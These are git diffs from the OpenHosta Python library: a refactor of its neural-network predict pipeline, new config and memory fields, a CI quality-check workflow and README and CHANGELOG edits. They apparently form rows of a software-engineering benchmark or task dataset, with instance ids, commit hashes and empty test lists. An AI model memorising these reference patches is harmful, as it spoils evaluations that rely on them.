- raise ValueError(f"Invalid JSON configuration: {str(e)}")
+ return network
@classmethod
@@ -130,13 +144,13 @@ def from_torch_nn(cls, torch_model: nn.Module, loss_fn=None, optimizer=None) ->
network = cls()
# Iterating through the PyTorch model's children (layers)
- for layer in torch_model.children():
- try:
- nn_layer = pytorch_layer_to_custom(layer)
+ for layer in torch_model.model.children(): # assuming that the model as a attribut model !
+ nn_layer = pytorch_layer_to_custom(layer)
+ if nn_layer is not None:
network.add_layer(nn_layer)
- except ValueError as e:
- # print(f"Skipping unsupported layer: {e}")
+ else:
pass
+ # print(f"Skipping unsupported layer: {e}")
# Set loss function and optimizer if specified
if loss_fn is not None:
@@ -153,3 +167,19 @@ def from_torch_nn(cls, torch_model: nn.Module, loss_fn=None, optimizer=None) ->
print(f"Skipping unsupported optimizer: {e}")
return network
+
+ def to_pytorch_sequential_model(self) -> nn.Sequential:
+ """
+ Convert the NeuralNetwork instance to a PyTorch nn.Sequential model.
+
+ :return: A PyTorch nn.Sequential model.
+ """
+ layers = []
+ for layer in self.layers:
+ try:
+ pytorch_layer = custom_layer_to_pytorch(layer)
+ if pytorch_layer is not None:
+ layers.append(pytorch_layer)
+ except ValueError as e:
+ print(f"Skipping unsupported layer: {e}")
+ return nn.Sequential(*layers)
diff --git a/src/OpenHosta/exec/predict/model/neural_network_types.py b/src/OpenHosta/exec/predict/model/neural_network_types.py
index 1baae4d..a6d576b 100644
--- a/src/OpenHosta/exec/predict/model/neural_network_types.py
+++ b/src/OpenHosta/exec/predict/model/neural_network_types.py
@@ -85,8 +85,8 @@ class Layer:
Initialize a Layer object.
:param layer_type: The type of the layer.
- :param in_features: Number of _inputs features or channels.
- :param out_features: Number of _outputs features or channels.
+ :param in_features: Number of inputs features or channels.
+ :param out_features: Number of outputs features or channels.
:param kernel_size: Size of the kernel/filter.
:param stride: Stride of the kernel/filter.
:param padding: Padding added to the _inputs.
diff --git a/src/OpenHosta/exec/predict/predict.py b/src/OpenHosta/exec/predict/predict.py
index c5d7e2f..292b229 100644
--- a/src/OpenHosta/exec/predict/predict.py
+++ b/src/OpenHosta/exec/predict/predict.py
@@ -1,21 +1,23 @@
import os
-from typing import Union, Optional
+from typing import Union, Optional, Literal
from .dataset.dataset import HostaDataset, SourceType
from .dataset.oracle import LLMSyntheticDataGenerator
from .model import HostaModel
from .model.model_provider import HostaModelProvider
from .model.neural_network import NeuralNetwork
+from .model.neural_network_types import ArchitectureType
from .predict_config import PredictConfig
from .predict_memory import PredictMemory, File
from ...core.config import Model, DefaultModel
from ...core.hosta import Hosta, Func
+from ...core.logger import Logger, ANSIColor
def predict(
config: PredictConfig = PredictConfig(),
oracle: Optional[Union[Model, HostaDataset]] = None,
- verbose: int = 0
+ verbose: Union[Literal[0, 1, 2], bool] = 2
) -> Union[int, float, bool, str]:
"""
Predicts a result using an existing model or by creating a new one.
@@ -28,133 +30,168 @@ def predict(
Returns:
Model prediction
"""
- assert config is not None, "Please provide a valid configuration not None"
- assert verbose is not None and 0 <= verbose <= 2, "Please provide a valid verbose level (0, 1 or 2) default is 0"
- func: Func = getattr(Hosta(), "_infos")
+ assert config is not None, "Please provide a valid configuration not None"
+ x = Hosta()
+ func: Func = getattr(x._update_call(), "_infos")
+
name = config.name if config and config.name else str(func.f_name)
base_path = config.path if config and config.path else os.getcwd()
memory: PredictMemory = PredictMemory.load(base_path=base_path, name=name)
- dataset: Optional[HostaDataset] = None
-
- hosta_model: HostaModel = get_hosta_model(memory.architecture, func, config, verbose)
- if verbose == 2:
- print(f"[\033[92mArchitecture\033[0m] loaded, type : {type(hosta_model).__name__}")
-
- if not load_weights(memory, hosta_model, verbose):
- train_model(config, memory, hosta_model, dataset, oracle, func, verbose)
+ logger: Logger = Logger(log_file_path=memory.summary.path, verbose=verbose)
+
+ dataset: Optional[HostaDataset] = getattr(func.f_obj, "_dataset", None)
+
+ hosta_model: HostaModel = get_hosta_model(func, memory.architecture, logger, config)
+
+ if not load_weights(x, memory, hosta_model, logger):
+ train_model(config, memory, hosta_model, oracle, func, logger)
if dataset is None:
- dataset = HostaDataset.from_input(func.f_args, verbose)
+ dataset = HostaDataset.from_input(func.f_args, logger, config.max_tokens, func, memory.dictionary.path)
+ x.attach(func.f_obj, {"_dataset": dataset})
else:
- dataset.prepare_inference(func.f_args)
+ dataset.prepare_inference(func.f_args, config.max_tokens, func, memory.dictionary.path)
+
+ if not hasattr(func.f_obj, "_model"):
+ setattr(func, "_model", hosta_model)
+
+ if config.normalize:
+ dataset.normalize_input_inference(memory.normalization)
torch_prediction = hosta_model.inference(dataset.inference.input)
- prediction = dataset.decode(torch_prediction, func_f_type=func.f_type[1])
- if predict is list:
- return prediction[0]
- else:
- return prediction
+ if config.normalize:
+ torch_prediction = dataset.denormalize_output_inference(torch_prediction, memory.normalization)
+ output, prediction = dataset.decode(torch_prediction, func_f_type=func.f_type)
+ logger.log_custom("Prediction", f"{prediction} -> {output}", color=ANSIColor.BLUE_BOLD, level=1)
+ return output
-def get_hosta_model(architecture_file: File, func: Func, config: Optional[PredictConfig] = None, verbose: int = 0) -> HostaModel:
+def get_hosta_model(func: Func, architecture_file: File, logger: Logger, config: Optional[PredictConfig] = None) -> HostaModel:
"""
Load or create a new model.
"""
- architecture: Optional[NeuralNetwork] = None
+ if hasattr(func.f_obj, "_model"):
+ return getattr(func.f_obj, "_model")
+
+ architecture: Optional[NeuralNetwork] = load_architecure(architecture_file, logger)
+
+ model = HostaModelProvider.from_hosta_func(func, config, architecture, architecture_file.path, logger)
+ return model
+
+def load_architecure(architecture_file: File, logger: Logger) -> Union[NeuralNetwork, None]:
+ """
+ Load the architecture if it exists.
+ """
if architecture_file.exist:
- with open(architecture_file.path, "r") as file:
+ with open(architecture_file.path, 'r', encoding='utf-8') as file:
json = file.read()
- architecture = NeuralNetwork.from_json(json)
- if verbose == 2:
- print(f"[\033[92mArchitecture\033[0m] found at {architecture_file.path}")
- else:
- if verbose == 2:
- print(f"[\033[93mArchitecture\033[0m] not found, creating one")
- return HostaModelProvider.from_hosta_func(func, config, architecture, architecture_file.path, verbose)
-
+ logger.log_custom("Architecture", f"found at {architecture_file.path}", color=ANSIColor.BRIGHT_GREEN, level=2)
+ return NeuralNetwork.from_json(json)
+ else :
+ logger.log_custom("Architecture", "not found", color=ANSIColor.BRIGHT_YELLOW, level=2)
+ return None
-def load_weights(memory: PredictMemory, hosta_model: HostaModel, verbose :int) -> bool:
+def load_weights(x: Hosta, memory: PredictMemory, hosta_model: HostaModel, logger: Logger) -> bool:
"""
Load weights if they exist.
"""
- if memory.weights.exist:
+ # if hasattr(x._infos.f_obj, "_weights_loaded"):
+ # return True
- if verbose == 2:
- print(f"[\033[92mWeights\033[0m] found at {memory.weights.path}")
+ if memory.weights.exist:
+ logger.log_custom("Weights", f"found at {memory.weights.path}", color=ANSIColor.BRIGHT_GREEN, level=2)
hosta_model.init_weights(memory.weights.path)
+ x.attach(x._infos.f_obj, {"_weights_loaded": True})
return True
- if verbose == 2:
- print(f"[\033[92mWeights\033[0m] not found generate new ones")
- return False
+ logger.log_custom("Weights", "not found", color=ANSIColor.BRIGHT_YELLOW, level=2)
+ return False
-def train_model(config: PredictConfig, memory: PredictMemory, model: HostaModel, dataset: HostaDataset, oracle: Optional[Union[Model, HostaDataset]], func: Func, verbose: int) -> None:
+def train_model(config: PredictConfig, memory: PredictMemory, model: HostaModel, oracle: Optional[Union[Model, HostaDataset]], func: Func, logger: Logger) -> None:
"""
Prepare the data and train the model.
"""
if memory.data.exist:
- if verbose == 2:
- print(f"[\033[92mData\033[0m] found at {memory.data.path}")
- train_set, val_set = HostaDataset.from_data(memory.data.path, batch_size=1, shuffle=True, train_set_size=0.8, verbose=verbose) # verbose will prcess all the example and add it to val_set
+ logger.log_custom("Data", f"found at {memory.data.path}", color=ANSIColor.BRIGHT_GREEN, level=2)
+ dataset = HostaDataset.from_data(memory.data.path, logger=logger)
+ if config.batch_size is None:
+ config.batch_size = max(1, min(16384, int(0.05 * len(dataset.data))))
+
+ train_set, val_set = dataset.to_dataloaders(batch_size=config.batch_size, shuffle=True, train_ratio=0.8)
+
else:
- if verbose == 2:
- print(f"[\033[93mData\033[0m] not processed, preparing data")
- train_set, val_set = prepare_dataset(config, memory, dataset, func, oracle, verbose)
+ logger.log_custom("Data", "not found", color=ANSIColor.BRIGHT_YELLOW, level=2)
+ train_set, val_set = prepare_dataset(config, memory, func, oracle, model, logger)
+
+ logger.log_custom("Training", f"epochs: {config.epochs}, batch_size: {config.batch_size}, train_set size: {len(train_set)}, val_set size: {len(val_set)}", color=ANSIColor.BRIGHT_YELLOW, level=2)
if config.epochs is None:
config.epochs = int(2 * len(train_set.dataset) / config.batch_size if config.batch_size != len(train_set.dataset)\
else 2 * len(train_set.dataset))
assert config.epochs > 0, f"epochs must be greater than 0 now it's {config.epochs}"
-
+
model.trainer(train_set, epochs=config.epochs)
- if verbose > 0:
+ if logger.verbose >= 1:
model.validate(val_set)
-
+
+
model.save_weights(memory.weights.path)
-def prepare_dataset(config: PredictConfig, memory: PredictMemory, dataset: HostaDataset, func: Func, oracle: Optional[Union[Model, HostaDataset]], verbose: int) -> tuple:
+def prepare_dataset(config: PredictConfig, memory: PredictMemory, func: Func, oracle: Optional[Union[Model, HostaDataset]], model: HostaModel, logger: Logger) -> tuple:
"""
Prepare the dataset for training.
"""
+
+ if config.dataset_path is None:
+ generated_data_path = os.path.join(memory.predict_dir, "generated_data.csv")
+ if os.path.exists(generated_data_path) and os.path.getsize(generated_data_path) > 0:
+ logger.log_custom("Dataset", "no data.json found, but found generated_data.csv, loading it", color=ANSIColor.BRIGHT_GREEN, level=2)
+ config.dataset_path = generated_data_path
+
if config.dataset_path is not None:
- if verbose == 2:
- print(f"[\033[92mDataset\033[0m] found at {config.dataset_path}")
- dataset = HostaDataset.from_files(config.dataset_path, SourceType.CSV, verbose) # or JSONL jsp comment faire la détection la
+ logger.log_custom("Dataset", f"found at {config.dataset_path}", color=ANSIColor.BRIGHT_GREEN, level=2)
+ dataset = HostaDataset.from_files(path=config.dataset_path, source_type=None, log=logger)
else :
- if verbose == 2:
- print(f"[\033[93mDataset\033[0m] not found, generate data")
- dataset = generate_data(func, oracle, verbose)
- dataset.save(os.path.join(memory.predict_dir, "generated_data.csv"), SourceType.CSV)
- if verbose == 2:
- print(f"[\033[92mDataset\033[0m] generated!")
- dataset.encode(max_tokens=10)
- dataset.tensorify()
- dataset.save_data(memory.data.path)
+ logger.log_custom("Dataset", "not found, generate data", color=ANSIColor.BRIGHT_YELLOW, level=2)
+ dataset = _generate_data(func, oracle, config, logger)
+ save_path = os.path.join(memory.predict_dir, "generated_data.csv")
+ dataset.save(save_path, SourceType.CSV)
+ logger.log_custom("Dataset", f"generated and saved at {save_path}", color=ANSIColor.BRIGHT_GREEN, level=2)
+
if config.batch_size is None:
- config.batch_size = int(0.05 * len(dataset.data)) if 0.05 * len(dataset.data) > 1 else len(dataset.data)
- train_set, val_set = dataset.convert_data(batch_size=config.batch_size, shuffle=True, train_set_size=0.8)
+ config.batch_size = max(1, min(16384, int(0.05 * len(dataset.data))))
- if verbose == 2:
- print(f"[\033[92mDataset\033[0m] processed and saved at {memory.data.path}")
+ dataset.encode(max_tokens=config.max_tokens, inference=False, func=func, dictionary_path=memory.dictionary.path)
+ if config.normalize:
+ dataset.normalize_data(memory.normalization)
+ dataset.tensorize()
+ dataset.save_data(memory.data.path)
+
+ train_set, val_set = dataset.to_dataloaders(batch_size=config.batch_size, shuffle=True, train_ratio=0.8)
+
+ logger.log_custom("Dataset", f"processed and saved at {memory.data.path}", color=ANSIColor.BRIGHT_GREEN, level=2)
return train_set, val_set
-def generate_data(func: Func, oracle: Optional[Union[Model, HostaDataset]], verbose: int) -> HostaDataset:
+def _generate_data(func: Func, oracle: Optional[Union[Model, HostaDataset]], config: PredictConfig, logger: Logger) -> HostaDataset:
"""
Generate data for training.
"""
+ request_amounts = int(config.generated_data / 100) if config.generated_data > 100 else 1
+
data = LLMSyntheticDataGenerator.generate_synthetic_data(
func=func,
- request_amounts=3, # TODO: make it a parameter
- examples_in_req=80, # TODO: make it a parameter
+ logger=logger,
+ request_amounts=request_amounts,
+ examples_in_req=int(config.generated_data / request_amounts),
model=oracle if oracle is not None else DefaultModel().get_default_model()
)
- return HostaDataset.from_list(data, verbose)
+ return HostaDataset.from_list(data, logger)
diff --git a/src/OpenHosta/exec/predict/predict_config.py b/src/OpenHosta/exec/predict/predict_config.py
index 645b7ca..997aea3 100644
--- a/src/OpenHosta/exec/predict/predict_config.py
+++ b/src/OpenHosta/exec/predict/predict_config.py
@@ -1,50 +1,45 @@
from typing import Optional
-from .model.neural_network_types import ArchitectureType
-
class PredictConfig:
def __init__(self,
- model_type: ArchitectureType = None,
name: str = None,
path: str = None,
- version: str = None,
- complexity: int = 4,
- max_tokens: int = 10,
+ complexity: int = 5,
+ growth_rate: float = 1.5,
+ coef_layers : int = 100,
+ normalize: bool = False,
epochs: Optional[int] = None,
batch_size: Optional[int] = None,
- learning_rate: Optional[float] = None,
- get_loss: Optional[float] = None,
- dataset_path: Optional[str] = None
- ):
- self.model_type: ArchitectureType = model_type
-
+ max_tokens: int = 1,
+ dataset_path: Optional[str] = None,
+ generated_data: Optional[int] = 100,
+ ):
self.name: str = name
self.path: str = path
- self.version: str = version
-
self.complexity: int = complexity
- self.max_tokens: int = max_tokens
-
- self.batch_size: int = batch_size
+ self.growth_rate: float = growth_rate
+ self.coef_layers: int = coef_layers
+ self.normalize: bool = normalize
self.epochs: int = epochs
- self.learning_rate: float = learning_rate
- self.get_loss: float = get_loss
+ self.batch_size: int = batch_size
+ self.max_tokens: int = max_tokens
self.dataset_path: str = dataset_path
+ self.generated_data: int = generated_data
def to_json(self):
return f"""{{
"name": "{self.name}",
- "model_type": "{self.model_type}",
- "weight_path": "{self.path}",
- "version": "{self.version}",
+ "path": "{self.path}",
"complexity": {self.complexity},
- "max_tokens": {self.max_tokens},
+ "growth_rate": {self.growth_rate},
+ "coef_layers": {self.coef_layers},
+ "normalize": {self.normalize},
"epochs": {self.epochs},
"batch_size": {self.batch_size},
- "learning_rate": {self.learning_rate},
- "get_loss": {self.get_loss},
+ "max_tokens": {self.max_tokens},
"dataset_path": "{self.dataset_path}",
+ "generated_data": {self.generated_data}
}}"""
@staticmethod
@@ -53,14 +48,14 @@ def from_json(json_str: str):
data = json.loads(json_str)
return PredictConfig(
name=data["name"],
- model_type=ArchitectureType(data["model_type"]),
path=data["path"],
- version=data["version"],
complexity=data["complexity"],
- max_tokens=data["max_tokens"],
+ growth_rate=data["growth_rate"],
+ coef_layers=data["coef_layers"],
+ normalize=data["normalize"],
epochs=data["epochs"],
batch_size=data["batch_size"],
- learning_rate=data["learning_rate"],
- get_loss=data["get_loss"],
+ max_tokens=data["max_tokens"],
dataset_path=data["dataset_path"],
+ generated_data=data["generated_data"]
)
diff --git a/src/OpenHosta/exec/predict/predict_memory.py b/src/OpenHosta/exec/predict/predict_memory.py
index 74ebd04..90469cd 100644
--- a/src/OpenHosta/exec/predict/predict_memory.py
+++ b/src/OpenHosta/exec/predict/predict_memory.py
@@ -1,19 +1,26 @@
import os
+from dataclasses import dataclass
from enum import Enum
-from typing import Optional, Dict, NamedTuple
+from typing import Optional, Dict
from ...core.memory import HostaMemory
-# 1. Structures de base
-File = NamedTuple("File", [("exist", bool), ("path", str)])
+
+@dataclass
+class File:
+ exist: bool
+ path: str
+
class PredictFileType(Enum):
"""Enumaration for different types of files in the prediction memory."""
ARCHITECTURE = "model.json"
WEIGHTS = "weights.pth"
- DICTIONARY = "dictionary.txt"
+ DICTIONARY = "dictionary.json"
DATA = "data.json"
SUMMARY = "summary.txt"
+ NORMALIZATION = "normalization.json"
+
class PredictMemory(HostaMemory):
"""
@@ -22,6 +29,7 @@ class PredictMemory(HostaMemory):
He uses the File structure to store the status of each file and his path.
"""
+
def __init__(self, base_path: Optional[str] = None, *, name: str = None, **kwargs):
super().__init__(base_path=base_path, **kwargs)
if name is None:
@@ -41,11 +49,10 @@ def load(base_path: Optional[str] = None, name: str = None) -> 'PredictMemory':
PredictMemory instance.
"""
memory = PredictMemory(base_path=base_path, name=name)
- memory._initialize_predict_directory
+ memory._initialize_predict_directory()
memory._check_files()
return memory
- @property
def _initialize_predict_directory(self) -> None:
"""
Initializes the directory and file structure for predictions.
@@ -67,16 +74,25 @@ def _check_files(self) -> None:
self.files[file_type] = File(exist=exists, path=path)
@property
- def architecture(self) -> File: return self.files[PredictFileType.ARCHITECTURE]
+ def architecture(self) -> File:
+ return self.files[PredictFileType.ARCHITECTURE]
+
+ @property
+ def weights(self) -> File:
+ return self.files[PredictFileType.WEIGHTS]
@property
- def weights(self) -> File: return self.files[PredictFileType.WEIGHTS]
+ def data(self) -> File:
+ return self.files[PredictFileType.DATA]
@property
- def data(self) -> File: return self.files[PredictFileType.DATA]
+ def summary(self) -> File:
+ return self.files[PredictFileType.SUMMARY]
@property
- def summary(self) -> File: return self.files[PredictFileType.SUMMARY]
+ def dictionary(self) -> File:
+ return self.files[PredictFileType.DICTIONARY]
@property
- def dictionary(self) -> File: return self.files[PredictFileType.DICTIONARY]
+ def normalization(self) -> File:
+ return self.files[PredictFileType.NORMALIZATION]
diff --git a/src/OpenHosta/utils/torch_nn_utils.py b/src/OpenHosta/utils/torch_nn_utils.py
index 0763130..ea38199 100644
--- a/src/OpenHosta/utils/torch_nn_utils.py
+++ b/src/OpenHosta/utils/torch_nn_utils.py
@@ -1,4 +1,4 @@
-from typing import Union
+from typing import get_origin, Literal, Union
from torch import nn
from torch import optim
@@ -242,9 +242,10 @@ def custom_optimizer_to_pytorch(optimizer_algorithm: OptimizerAlgorithm, model:
def type_size(data, tokens_size=10):
"""
- Calculate the _inputs/_outputs size based on the type of the _inputs data.
+ Calculate the inputs/outputs size based on the type of the inputs data.
Parameters:
+ tokens_size: The size of the tokens in the _inputs data.
data: Can be of type int, float, list, tuple, numpy array, PyTorch tensor, set, dict, or string.
Returns:
@@ -266,7 +267,7 @@ def type_size(data, tokens_size=10):
return sum(type_size(item) for item in data)
elif data is dict:
return sum(type_size(k) + type_size(v) for k, v in data.items())
- # elif isinstance(data, typing._GenericAlias) and get_origin(data) is Literal:
- # return len(data.__args__)
+ elif get_origin(data) is Literal:
+ return len(data.__args__)
else:
raise TypeError(f'Unsupported data type: {type(data)}')
| Classification gestion for encoder in predict
Feature/normalization
| 2024-11-27T16:21:43 | 0.0 | [] | [] |
|||
hand-e-fr/OpenHosta | hand-e-fr__OpenHosta-147 | 218a0a45b6bcf5217abe3219e1136a2c76c47657 | diff --git a/.flake8 b/.flake8
deleted file mode 100644
index 93c3a6e..0000000
--- a/.flake8
+++ /dev/null
@@ -1,14 +0,0 @@
-[flake8]
-
-filename =
- src/OpenHosta.py
- src/setup.py
-extend-exclude =
- src/__pycache__/
- jipynb/
-max_line_length = 99
-ident-size = 3
-disable_noqa = True
-statistics = True
-output-file = errors.txt
-doctests = True
\ No newline at end of file
diff --git a/.github/workflows/quality_check.yml b/.github/workflows/quality_check.yml
new file mode 100644
index 0000000..c96d87c
--- /dev/null
+++ b/.github/workflows/quality_check.yml
@@ -0,0 +1,123 @@
+name: Python Quality Check
+
+on:
+ push:
+ branches:
+ - main
+ - dev
+ pull_request:
+ branches:
+ - main
+ - dev
+
+jobs:
+ setup:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+
+ - name: Set up Python 3.12
+ uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Install dependencies
+ run: |
+ python -m pip install --upgrade pip
+ pip install .[dev,pydantic]
+
+ - name: Cache dependencies
+ uses: actions/cache@v4
+ with:
+ path: ~/.cache/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/requirements.txt') }}
+ restore-keys: |
+ ${{ runner.os }}-pip-
+
+ code-quality:
+ needs: setup
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Install dependencies
+ run: pip install .[dev,pydantic]
+
+ - name: Run autopep8
+ run: python -m autopep8 --recursive --in-place src/OpenHosta
+
+ - name: Run pyflakes
+ run: python -m pyflakes src/OpenHosta/
+ continue-on-error: true
+
+ - name: Run isort
+ run: python -m isort --check-only --diff src/OpenHosta
+ continue-on-error: true
+
+ static-analysis:
+ needs: setup
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Install dependencies
+ run: pip install .[dev,pydantic]
+
+ - name: Run mypy
+ run: python -m mypy src/OpenHosta
+ continue-on-error: true
+
+ - name: Run pylint
+ run: python -m pylint --rcfile=pyproject.toml src/OpenHosta
+ continue-on-error: true
+
+ - name: Run bandit
+ run: python -m bandit -c pyproject.toml -r src/OpenHosta -f txt
+ continue-on-error: true
+
+ unit-tests:
+ needs: setup
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Install dependencies
+ run: pip install .[tests]
+
+ - name: Run unit tests
+ run: python -m pytest tests/unitTests -v --cov=OpenHosta.core
+
+ functional-tests:
+ needs: setup
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Install dependencies
+ run: pip install .[tests]
+
+ - name: Run functional tests
+ run: python -m pytest tests/functionnalTests -v --cov=OpenHosta
+
+ notify:
+ needs: [code-quality, static-analysis, unit-tests, functional-tests]
+ runs-on: ubuntu-latest
+ if: always()
+ steps:
+ - name: Check for failures
+ if: contains(needs.*.result, 'failure')
+ run: |
+ echo "Some jobs have failed. Check the logs above for more details."
+ exit 1
\ No newline at end of file
diff --git a/.gitignore b/.gitignore
index 553075f..8b11efb 100644
--- a/.gitignore
+++ b/.gitignore
@@ -15,4 +15,9 @@ __hostacache__/
.pytest_cache
src/OpenHosta.egg-info
build/
-.pypirc
\ No newline at end of file
+.pypirc
+mypy/
+.mypy_cache/
+linter.py
+*pt.py
+tests/reports/*report.txt
\ No newline at end of file
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 933d490..d2f7511 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,36 @@ All significant changes to this project will be documented in this file.
---
+## **v2.0-beta2**
+- **Added**
+ - Introduced `BaseEncoder` as an Abstract Base Class (ABC) for all specific encoders, providing a standardized interface.
+ - Added `BoolEncoder` to handle encoding of boolean values.
+ - Introduced `PredictConfig` data class to encapsulate parameters for the `predict` function.
+ - Initial implementation of the `HostaCache` class in `core/cache.py` with generic type support.
+ - Initial implementation of the `ModelCachedData` and `HostaModelCache` classes in `predict/cache.py`.
+- **Changed**
+ - Refactored `IntEncoder` and `FloatEncoder` to inherit from `BaseEncoder` and implement the encode method.
+ - Updated `HostaEncoder` to use a dictionary (`self.encoders`) for mapping data types to their corresponding encoders. This allows for easier extension and maintenance.
+ - Improved type handling in `HostaEncoder.encode` method for better extensibility and readability.
+ - Refactored `predict` function to accept a single `PredictConfig` object instead of multiple parameters. This change improves readability and maintainability of the function.
+- **Fixed**
+ - Enhanced exception handling in `FloatEncoder` to provide more informative error messages.
+ - Removed unnecessary constructors from encoder classes, streamlining the code.
+
+## **v2.0-beta1**
+
+- **Features**
+ - Added `max_tokens` args for emulate
+ - Added `use_locals/self_as_ctx` args for emulate for clarity and modularity
+ - `thought` is now used to add chain of thoughts in a emulated function
+ - `PromptManager` is now available for users to change all meta-prompt.
+
+- **Changes**
+ - `thought` function become `thinkof`
+ - `suggest` is removed
+ - `creativity` become `temperature` and `diversity` become `top_p`
+ - There's no more `hostacache` for emulated functions
+
## **OpenHosta v1.2.1 - 10/14/24**
- **Fixes**
diff --git a/Makefile b/Makefile
index e331e08..ac0c0cd 100644
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,4 @@
+
PACKAGE_NAME := OpenHosta
SRC_DIR := src/OpenHosta
TEST_DIR := tests
@@ -50,9 +51,6 @@ help:
install: all
@$(L_SHELL) $(WRITE) '$(TAG) [INSTALL]' $(COLOR)
- @$(L_SHELL) $(WRITE) '$(TAG) Installing dependencies...' $(COLOR)
- @$(PIP) install requirements.txt > $(NULL_DEVICE)
- @$(PIP) install requirements-dev.txt > $(NULL_DEVICE)
@$(L_SHELL) $(WRITE) '$(TAG) Installing package: $(PACKAGE_NAME)...' $(COLOR)
@$(PIP) install . > $(NULL_DEVICE)
@$(L_SHELL) $(WRITE) '$(TAG) Succesfully installed $(PACKAGE_NAME) !' $(COLOR)
@@ -64,29 +62,6 @@ build: clean
upload: build
$(PYTHON) -m twine upload dist/* --verbose
-ftests: clean
- @$(L_SHELL) $(WRITE) '$(TAG) Installing package: $(PACKAGE_NAME)...' $(COLOR)
- @$(PIP) install . > $(NULL_DEVICE)
- @$(L_SHELL) $(WRITE) '$(TAG) Running functionnal tests...' $(COLOR)
- @$(L_SHELL) $(SET_ENV)
- @-$(L_SHELL) "$(PYTEST) .\\tests\\functionnalTests\\test_mandatory.py $(ARGS)"
- @$(L_SHELL) $(UNSET_ENV)
- @$(L_SHELL) $(WRITE) '$(TAG) Uninstalling package: $(PACKAGE_NAME)...' $(COLOR)
- @$(PIP) uninstall -y OpenHosta > $(NULL_DEVICE)
- @$(L_SHELL) $(WRITE) '$(TAG) Succesfully ran functionnal tests !' $(COLOR)
-
-utests: clean
- @$(L_SHELL) $(WRITE) '$(TAG) Installing package: $(PACKAGE_NAME)...' $(COLOR)
- @$(PIP) install . > $(NULL_DEVICE)
- @$(L_SHELL) $(WRITE) '$(TAG) Running unit tests...' $(COLOR)
- @$(L_SHELL) $(SET_ENV)
- @-$(L_SHELL) "$(PYTEST) .\\tests\\unitTests\\test_exec.py $(ARGS)"
- @$(L_SHELL) $(UNSET_ENV)
- @$(L_SHELL) $(WRITE) '$(TAG) Uninstalling package: $(PACKAGE_NAME)...' $(COLOR)
- @$(PIP) uninstall -y OpenHosta > $(NULL_DEVICE)
- @$(L_SHELL) $(WRITE) '$(TAG) Succesfully ran unit tests !' $(COLOR)
-
-
clean:
@$(L_SHELL) $(WRITE) '$(TAG) [CLEAN]' $(COLOR)
@$(L_SHELL) $(WRITE) '$(TAG) Cleaning repository...' $(COLOR)
@@ -96,6 +71,8 @@ clean:
@$(L_SHELL) $(FIND) 'dist' | $(RM)
@$(L_SHELL) $(FIND) 'OpenHosta.egg-info' | $(RM)
@$(L_SHELL) $(FIND) '.pytest_cache' | $(RM)
+ @$(L_SHELL) $(FIND) '.mypy_cache' | $(RM)
+ @$(L_SHELL) $(FIND) '.coverage' | $(RM)
@$(L_SHELL) $(WRITE) '$(TAG) Uninstalling package: $(PACKAGE_NAME)...' $(COLOR)
@$(PIP) uninstall -y OpenHosta > $(NULL_DEVICE)
@$(L_SHELL) $(CLEAR)
diff --git a/README.md b/README.md
index e0693af..d802994 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
# OpenHosta
-v1.2.1 - Opensource Project
+v2.0-beta2 - Opensource Project
**- The future of development is human -**
@@ -12,11 +12,7 @@ For this project, we have adopted a [Code of Conduct](CODE_OF_CONDUCT.md) to ens
- [OpenHosta](#openhosta)
- [Table of Content](#table-of-content)
- [How to install OpenHosta ?](#how-to-install-openhosta-)
- - [Prerequisites](#prerequisites)
- - [Installation](#installation)
- - [Via pip](#via-pip)
- - [Via git (Developper version)](#via-git-developper-version)
- - [Example](#example)
+ - [Example](#example)
- [Further information](#further-information)
- [Contributing](#contributing)
- [License](#license)
@@ -26,81 +22,21 @@ For this project, we have adopted a [Code of Conduct](CODE_OF_CONDUCT.md) to ens
## How to install OpenHosta ?
-### Prerequisites
+You can install OpenHosta either via pip or via GitHub.
-1. **Python 3.10 | 3.11 | 3.12**
- - Download and install Python from [python.org](https://www.python.org/downloads/).
-
-2. **pip**
- - pip is generally included with Python. Verify its installation with:
- ```sh
- pip --version
- ```
-
-3. **Git**
- - Download and install Git from [git-scm.com](https://git-scm.com/downloads).
-
-4. **Virtual Environment (optional)**
- - Create and activate a virtual environment:
- ```bash
- python -m venv env
- ```
- - Activate the virtual environement:
- ```bash
- .\env\Scripts\activate # Windows
- source env/bin/activate # macOS/Linux
- ```
-
-5. **API Key**
- - **API Key**: Log in to your OpenAI account from [openai.com](https://openai.com/), then create your API key. For further information, you can check this [tuto](https://help.openai.com/en/articles/4936850-where-do-i-find-my-openai-api-key).
-
-### Installation
-
-#### Via pip
-
-1. Run the following command to install OpenHosta directly:
-
```sh
-pip install openhosta
+pip install OpenHosta[all]
```
-2. After the installation, you can verify that OpenHosta is installed correctly by running:
+or
```sh
-pip show openhosta
-```
-
-#### Via git (Developper version)
-
-1. Clone the **Git repository** to your local machine using the following command:
-
-```bash
git clone [email protected]:hand-e-fr/OpenHosta.git
```
-2. Navigate to the **directory** of the cloned project:
-
-```bash
-cd OpenHosta
-```
-
-3. Ensure you have installed the necessary **dependencies** before starting.
-
-```bash
-pip install .
-```
-
-4. Check that you have the correct version from Python.
-
-```python
-import OpenHosta
-
-OpenHosta.__version__
-```
-
-This way you have all the documentation and source code to understand our project
+**See the full installation guide [here](docs/installation.md)**
-### Example
+## Example
```python
from OpenHosta import emulate, config
@@ -116,7 +52,7 @@ def translate(text:str, language:str)->str:
result = translate("Hello World!", "French")
print(result)
```
-You check OpenHosta's [documentation](doc/Docs.md) for more detailled informations or exemple
+You check OpenHosta's [documentation](docs/doc.md) for more detailled informations or exemple
## Further information
diff --git a/doc/PMAC.md b/docs/PMAC.md
similarity index 100%
